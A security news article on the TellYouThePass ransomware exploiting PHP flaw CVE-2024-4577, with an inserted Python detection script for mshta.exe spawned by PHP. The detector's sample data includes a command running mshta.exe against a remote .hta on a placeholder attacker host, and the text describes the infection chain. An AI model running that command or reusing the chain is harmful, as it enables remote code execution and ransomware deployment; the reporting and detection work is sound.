Ransomware Gang TellYouThePass Exploits PHP Vulnerability
Flaw Allows Unauthenticated Attackers to Execute Arbitrary Code

A ransomware operation with a history of exploiting widespread internet vulnerabilities lost little time in making use of a critical-severity vulnerability in Windows installations of the web-scripting language PHP.
Imperva Threat Research in a Monday report said TellYouThePass ransomware operators began exploiting the PHP bug, tracked as CVE-2024-4577, hours after researchers released a proof of concept script (see: Critical PHP Vulnerability Threatens Windows Servers).
The TellYouThePass ransomware group, active since 2019, sees opportunity in cyber incidents that have system administrators globally scrambling to patch systems. It was among the cybercriminal groups to jump on the 2021 vulnerability known as Log4Shell. Security researchers say it has a history of appearing in new forms. Chinese network security firm Sangfor spotted it in March.
Imperva researchers said Monday they observed multiple hacking attempts against Windows PHP systems involving web shell uploads and efforts to deploy ransomware.
Attackers use the PHP flaw to execute arbitrary PHP code by using the PHP system function to run an HTML application file hosted on a hacker-controlled web server. The attackers use mshta.exe to launch the attack - mshta.exe is a "native Windows binary that can execute remote payloads, pointing to the attackers operating in a 'living off the land' style," said Imperva researchers.
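A defender-side check suggested by the mshta.exe chain above, added here as an example and not taken from Imperva's report: it scans constructed process-creation events (Sysmon-style parent image, image and command line) for mshta.exe launched by a PHP process or pointed at a remote .hta file. The PHP executable names, the event layout and the host name are assumptions; dd3.hta is the file name named in the report.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcessEvent:
    """Minimal process-creation record (assumed Sysmon Event ID 1 layout)."""
    parent_image: str
    image: str
    command_line: str


# Assumed names of PHP executables; none of them should spawn mshta.exe under normal operation.
PHP_PARENTS = {"php-cgi.exe", "php.exe"}
# mshta.exe fetching an .hta over HTTP(S) rather than opening a local file.
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: ProcessEvent) -> Optional[str]:
    """Return an alert label for one event, or None when nothing suspicious is seen."""
    if basename(event.image) != "mshta.exe":
        return None
    php_parent = basename(event.parent_image) in PHP_PARENTS
    remote = bool(REMOTE_HTA.search(event.command_line))
    if php_parent and remote:
        return "php-spawned mshta fetching remote HTA"
    if php_parent:
        return "php-spawned mshta"
    if remote:
        return "mshta fetching remote HTA"
    return None


def scan(events: List[ProcessEvent]) -> List[Tuple[str, str]]:
    """Return (command line, alert label) for every event that trips a rule."""
    return [(e.command_line, label) for e in events if (label := classify(e)) is not None]


# Constructed sample events; the host name is a placeholder, not an indicator from the report.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\php\php-cgi.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta.exe http://attacker-host.example/dd3.hta"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 r"mshta.exe C:\Tools\local-helper.hta"),
    ProcessEvent(r"C:\php\php-cgi.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for cmd, label in scan(SAMPLE_EVENTS):
        print(f"ALERT [{label}]: {cmd}")
```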
The initial infection involves an HTML application named dd3.hta that contains a malicious VBScript. This VBScript includes a base64 encoded string that, when decoded, reveals bytes of a binary loaded into memory during runtime.
The extracted bytes reveal a serialized method, which loads a Portable Executable file into memory during runtime - a .NET variant of the TellYouThePass ransomware. Once executed, the file sends an HTTP request to the command-and-control server, which contains details about the infected machine. The callback masquerades as a request to retrieve CSS resources, likely to evade detection.
The command-and-control IP was hard-coded in the sample Imperva studied. The malware concludes by publishing a ReadMe message in the web root directory, which provides details necessary for a ransom payment.